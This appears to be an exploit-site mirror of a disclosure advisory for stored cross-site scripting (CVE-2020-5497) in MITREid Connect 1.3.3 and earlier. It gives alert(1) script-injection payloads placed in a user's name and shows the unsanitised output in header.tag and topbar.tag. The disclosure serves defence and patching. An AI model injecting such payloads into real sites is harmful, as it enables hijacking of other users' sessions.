## https://sploitus.com/exploit?id=PACKETSTORM:156574
MITREid Connect OpenID-Connect-Java-Spring-Server
<https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server> version
1.3.3 and earlier is vulnerable to Cross-Site Scripting; the users name is
included in *topbar.tag* and *header.tag* without being sanitized. A user
can set their name to a value like:
Test</script><script>alert(1)</script>
Which will be included in JSON used by a JavaScript function in *header.tag*
:
// get the info of the current user, if available (null otherwise)
> function getUserInfo() {
> return {"sub":"12318767","name":"
> *Test</script><script>alert(1)</script>*
> Test","preferred_username":"Test","given_name":"Test</script><script>alert(1)</script>","family_name":"Test","email":"
> test@test.com","email_verified":true};}
A name such as:
Test<script>alert(1)</script>
would also work; it is included in the page when menus are created by
*topbar.tag*:
<!-- use a simplified user button system when collapsed -->
> <ul class="nav hidden-desktop">
> <li><a href="manage/#user/profile">*Test<script>alert(1)</script>*
> Test</a></li>
> <li class="divider"></li>
> <li><a href="" class="logoutLink"><i class="icon-remove"></i> Log
> out</a></li>
This issue has been reported on Github
<https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521>
with
patches pending.
A write up is available at:
https://www.securitymetrics.com/blog/MITREid-Connect-cross-site-scripting-CVE-2020-5497